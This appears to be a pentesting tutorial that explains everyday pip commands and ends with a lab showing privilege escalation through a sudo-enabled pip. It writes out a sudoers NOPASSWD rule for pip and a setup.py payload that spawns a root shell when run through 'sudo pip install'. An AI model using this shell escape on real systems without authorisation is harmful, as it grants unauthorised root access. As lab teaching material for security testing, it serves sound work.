The main objective of this article is to make attentive our readers for the another most expedient command from the list of linux for pentesters. As we know apart from copying, downloading and searching task user desires other excessive operational mission i.e. installation of packages. So in this article we are going to make you familiar with the command that can perform such task i.e. “pip”. The main utilities of this command is to install, unistall, search python packages. So by knowing these functionality of pip command now we will check that how we can acquire its benefit in our mission of Privilege Escalation.
Table of content
Introduction to pip
· Major Operation performed using pip
Exploiting pip
· SUID Lab setups for privilege Escalation
· Exploiting SUID
Introduction to pip
Before we start, let's do a quick appendix check and determine what a 'Python package' is in actually. It is a Python module which can contain other modules or recursively, other packages. It is the kind of Python package that you import in your Python code. So there are many tools available that helps to install such packages and “pip” is one of that which is widely used in today’s era.
The pip is an abbreviation of “python install packages” which is a tool for installing and managing Python packages. This command is very useful for web development as well as for sys-admins who manages cloud computing based resources. Now we will start by running its help command to know the depth of “pip” operations.
pip --help
Major operations performed by “pip”
List all installed packages: To check the list of all installed python packages in our machine we can use option “list” followed by pip command. The list option has its vital role in pip command as it can perform many operations that a user can need. Some of these functions are listed below:
· List installed packages: This will help in listing all the installed packages.
pip list
Other option for package listing:
Syntax: pip list
List outdated packages: Whenever we wish to check the list for all those packages that are outdated then we will use “--outdated” option followed by pip list command which will provide the list of all installed outdated packages with its current and latest version.
pip list --outdated
List installed packages with column formatting: If we wants to display the desired output in specific format then we will use “--format” option for this purpose. Suppose I want wish to list the details in column format then I will frame command as below.
pip list --format columns
List outdated packages with column formatting: This is same as format option consisting some more fields to display the output as current version, latest version, and type of installed packages.
pip list -o --format columns
List packages that are not dependencies of other packages: whenever anybody required to check the list for those installed packages who are not have any kind of responsibleness of other packages then we will frame command as below.
pip list --outdated --not-required
To install new package: As above I have described main objective of pip command is “installing new packages” so now by grabbing this advantage I am installing ‘flask”.
Syntax: pip install
pip install flask
Show information about packages: The “show” option in pip assist to reflects the detailed information about installed packages.
Syntax: pip show
pip show flask
As from below image it can be well understood that after using show option it has produced the output by showing the relevant information of flask.
To uninstall any package: Apart from installing the software packages we also required its other phase i.e. uninstallation. The pip command tends this utility too where one can uninstall the desired packages without any hassle.
Syntax: pip uninstall
pip uninstall jinja2
Here in the below image I’m showing to uninstall “jinja2” which is a modern-day templating language for Python developers.
To freeze any package: Freezing is a procedure where pip reads the versions of all installed packages in a local virtual atmosphere and then produces a text file with the package version for each python package stated. For performing this operation use option “freeze” as shown below.
Syntax: pip freeze >
pip freeze > komal.txt
To search for installed package: The search option helps to search for an available Python package. The search term generates quite a widespread group of packages.
Syntax: pip search
pip search keyring
Most of the time, we wish to hunt for packages directly in the PyPI website. So PyPI delivers such search abilities for its index and a way to filter results. Now I’m framing command as shown below to search for “keyring”.
To create hash for any package: A Hash Value is a string value of specific length which is the result of calculation of a Hashing Algorithm. One of the chief uses of Hash Values is to define the Integrity of any Data (which can be a file, attachments, downloads etc).
Syntax: pip hash
pip hash rockyou.txt
The pip provides this functionality too to maintain the integrity of installed packages. In below image I’m using this option for creating hash value of a file i.e. “rockyou.txt.
To download any file or package: Instead of above all described task “pip” also supports the functionality to upload, download, read etc. for any file. Here I’m using one of these i.e. download the package. Pip download use to download file and package into default path or can do the same for specific path.
In below image I have used this to download a compressed file from remote location.
Syntax: pip download
pip download http://192.168.1.10:8000/5622.tar.bz2
Exploiting pip
Sudo Rights Lab setups for Privilege Escalation
Now we will start our task of privilege escalation. For this very first we have to set up our lab of pip command with administrative rights. After that we will check for the pip command that what influence it has after getting sudo rights and how we can use it more for privilege escalation.
It can be clearly understood by the below image in which I have created a local user (test) who own all sudo rights as root and can achieve all task as admin.
To add sudo right open etc/sudoers file and type following as user Privilege specification.
test All=(root) NOPASSWD: /usr/bin/pip
Exploiting Sudo rights
Now we will start exploiting pip service by taking the privilege of sudoer’s permission. Suppose we got the sessions of victim’s machine that will assist us to have local user access of the targeted system through which we can escalate the root user rights.
Very first we will connect to the target machine with ssh, therefore, type following command to get access through local user login.
ssh test@192.168.1.108
Then we look for sudo right of “test” user (if given) and found that user “test” can execute the pip command as “root” without a password.
sudo -l
Now after knowing the fact that test user attains admin rights so, taking this benefit here we can use pip command to run in privileged context and can be used to access the file system, escalate or maintain access with higher privileges if permitted on sudo.
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')"> $TF/setup.py
sudo pip install $TF
Conclusion: Hence we have successfully exploited pip by achieving its functionality after granting higher privilege.
Reference link: https://gtfobins.github.io